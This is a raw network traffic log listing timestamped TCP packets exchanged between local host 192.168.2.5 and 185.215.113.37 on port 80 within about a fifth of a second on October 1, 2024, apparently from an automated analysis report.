Oct 1, 2024 16:50:01.014269114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014273882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014281034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014292002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014301062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014313936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014341116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014364958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014375925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014385939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014398098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014408112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014419079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014422894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014435053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014450073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014461040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014467955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014471054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014484882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014496088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014496088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014509916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014518023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014527082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014542103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014555931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.014657021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.014703035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069025993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069039106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069050074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069135904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069150925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069160938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069161892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069161892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069168091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069174051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069185019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069196939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069199085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069199085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069207907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069221020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069231033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069242954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069248915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069248915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069276094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069276094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069278002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069294930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069298983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069300890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069312096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069318056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069324017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069334030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069339991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069348097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069348097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069350004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069361925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069370985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069379091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069382906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069401979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069412947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069417953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069417953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069422960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069444895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069461107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069467068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069467068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069472075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069483042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069498062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069509029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069510937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069510937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069533110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069607019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069699049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069710016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069720030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069730997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069741964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069751978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069753885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069753885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069762945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069773912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069780111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069791079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069801092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069811106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069813013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069813013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069828033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069844007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069849968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069849968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069859982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069871902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069884062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069892883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069926023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069926023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069926023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.069984913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.069996119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070007086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070015907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070028067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070059061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070065022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070065022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070070982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070081949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070092916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070092916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070103884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070125103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070130110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070131063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070130110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070177078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070183992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070183992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070188999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070199013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070204973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070214987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070218086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070226908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070238113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070283890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070283890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.070318937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.070417881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101115942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101129055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101145029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101185083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101244926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101257086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101264954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101273060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101279020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101300955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101341009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101370096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101381063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101414919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101427078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101442099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101448059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101454973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101460934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.101527929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.101527929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.102588892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102601051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102612019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102689981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.102689981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.102718115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102729082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102740049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102771044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.102849007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102859974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102869987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102881908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102893114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102904081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102914095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102924109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102933884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.102936029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.102936029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.102936029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.103216887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.103240967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103250980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103261948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103360891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.103360891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.103405952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103416920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103426933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103437901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.103502035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.103502989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157439947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157454967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157464981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157479048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157532930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157535076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157543898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157555103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157561064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157569885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157574892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157574892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157603025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157684088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157747030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157757998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157767057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157777071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157793045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157799006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157803059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157813072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157818079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157819986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157857895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157876015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157886982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157897949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157905102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157905102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157905102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157908916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157921076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157932043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.157938004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157948971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157953978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.157960892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158041000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158041000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158101082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158112049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158123016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158153057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158170938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158246040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158256054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158272028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158282995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158293009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158308029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158323050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158323050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158344984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158355951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158365965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158375978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158376932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158376932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158389091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158399105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158443928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158453941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158454895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158454895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158464909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158479929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158489943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158500910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158505917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158510923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158515930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158520937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158523083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158523083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158523083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.158528090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.158576965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.164740086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164752960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164758921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164764881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164769888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164776087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164781094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164797068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164841890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164851904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164863110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164875984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164899111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.164918900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164923906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.164923906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.164930105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164940119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.164961100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.164975882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165031910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165044069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165054083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165064096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165072918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165083885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165086031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165112972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165146112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165177107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165193081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165203094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165215015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165225029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165252924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165252924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165252924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165291071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165302038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165301085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165312052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165321112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165330887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.165332079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165369987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.165400028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.189656973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189671040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189681053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189692020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189702034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189713001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189723969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189734936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:01.189734936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.189757109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.189757109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.189810991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:01.189997911 CEST	80	49704	185.215.113.37	192.168.2.5
